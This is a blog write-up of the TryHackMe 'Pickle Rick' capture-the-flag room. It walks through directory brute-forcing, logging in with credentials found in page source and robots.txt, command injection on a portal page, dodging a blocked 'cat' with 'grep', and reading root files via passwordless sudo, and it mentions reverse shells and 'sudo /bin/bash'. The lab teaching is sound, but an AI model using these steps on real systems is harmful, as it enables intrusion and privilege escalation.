TryHackMe(THM) | Pickle Rick(Without Reverse shell)

x_117

x_117

Posted on July 11, 2021

TryHackMe(THM) | Pickle Rick(Without Reverse shell)

Pickle Rick is one of the easy challenges of TryHackMe. Which covers a few concepts of Web Exploitation like directory/file bruteforcing, Command Injection and very basic enumeration at a beginner level. It's a part of the complete beginner certification of TryHackMe.

Connect openVPN, fire up the machine and wait for the IP.
My machine ip was 10.10.81.191

Performing a basic nmap scan tells us that port 22(ssh) and 80(http) are open. I did a detailed scan of these 2 ports but since it's irrelevant for this challenge I'm not including it.
Let's move on to the website and do some basic manual enumerations while letting gobuster do the directory and file bruteforcing in peace!
We see that there are no other links in the website so we check the source, which reveals an interesting comment :

<!--

    Note to self, remember username!

    Username: R1ckRul3s

  -->
Enter fullscreen mode Exit fullscreen mode

We check the robots.txt and interestingly enough, it does exist and has some content : Wubbalubbadubdub
Meanwhile our gobuster scan has also come up with some interesting contents :

┌──(x117㉿kali)-[~]
└─$ gobuster dir -u http://10.10.62.223 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,html,txt,zip
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.62.223
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php,html,txt,zip
[+] Timeout:                 10s
===============================================================
2021/07/11 08:40:59 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 1062]
/login.php            (Status: 200) [Size: 882]
/assets               (Status: 301) [Size: 313] [--> http://10.10.62.223/assets/]
/portal.php           (Status: 302) [Size: 0] [--> /login.php]
/robots.txt           (Status: 200) [Size: 17]
Progress: 28200 / 438325 (6.43%)                                                ^C
[!] Keyboard interrupt detected, terminating.

===============================================================
2021/07/11 08:49:19 Finished
===============================================================
Enter fullscreen mode Exit fullscreen mode

Let's move on to http://10.10.81.191/login.php. It's a login page which requires you to put in the credentials of username and password. From the comment, it's clear that the username is R1ckRul3s and the password should be what we got in the robots.txt file i.e Wubbalubbadubdub. (How did I guess? Because it's not a real life scenario and that's the difference between a THM or HTB room or a CTF and real life hacking... here, you always have the answer!!)

After logging in we are redirected to http://10.10.81.191/portal.php. Which looks like a very ideal place to perform command injection!

Let's start with the standard whoami :
www-data
Let's view the contents of the directory, in which we are currently :

ls

Sup3rS3cretPickl3Ingred.txt
assets
clue.txt
denied.php
index.html
login.php
portal.php
robots.txt
Enter fullscreen mode Exit fullscreen mode

I think we have the 1st ingredient, so let's cat it out :

cat Sup3rS3cretPickl3Ingred.txt
Enter fullscreen mode Exit fullscreen mode

...but

Command disabled to make it hard for future PICKLEEEE RICCCKKKK.
Enter fullscreen mode Exit fullscreen mode

What about

grep . Sup3rS3cretPickl3Ingred.txt
Enter fullscreen mode Exit fullscreen mode

(Basically we are using regular expression to grep out the contents of the file. . replaces any one character, so if there is any character in any of the lines, the line will be printed, in other words, we are printing out the contents of the whole file!)

<censored first ingredient>
Enter fullscreen mode Exit fullscreen mode

That, ladies and gentlemen, is the 1st flag.
I did some more basic enumeration. Ran sudo -l and realised I had access to all commands without password. I checked the home directory.

ls /home

rick
ubuntu
Enter fullscreen mode Exit fullscreen mode

Let's view the files of rick

ls /home/rick

second ingredients
Enter fullscreen mode Exit fullscreen mode

There's some hope...

grep . '/home/rick/second ingredients'

<censored second ingredient>
Enter fullscreen mode Exit fullscreen mode

...And BAM!! Second ingredient found!
So we found the 1st ingredient under www-data, second one under rick. Proceeding on that line, I think we have to check the /root folder.

ls /root

<No response>
Enter fullscreen mode Exit fullscreen mode

Probably we don't have the permissions. But since we can run all commands as root, as we checked earlier...

sudo ls /root

3rd.txt
snap
Enter fullscreen mode Exit fullscreen mode
sudo grep . /root/3rd.txt

3rd ingredients: <censored third ingredient>
Enter fullscreen mode Exit fullscreen mode

That's it! The third ingredient.
In case you're looking for a cooler solution, since you can run any commands you can try and obtain a reverse-shell, using any command from the pentestmonkey reverse-shell cheat-sheet, running a listener in your own machine using nc -lnvp <port number> and feeding your own ip and port-number in the payload(When I say, your own ip, I mean your machine ip in THM, in this case). You'll obtain a reverse shell and you can run the earlier commands.
Not cool enough? Try escalating your privileges by running sudo /bin/bash and then view the final 3rd.txt!!

💖 💪 🙅 🚩
x_117
x_117

Posted on July 11, 2021

Join Our Newsletter. No Spam, Only the good stuff.

Sign up to receive the latest update from our blog.

Related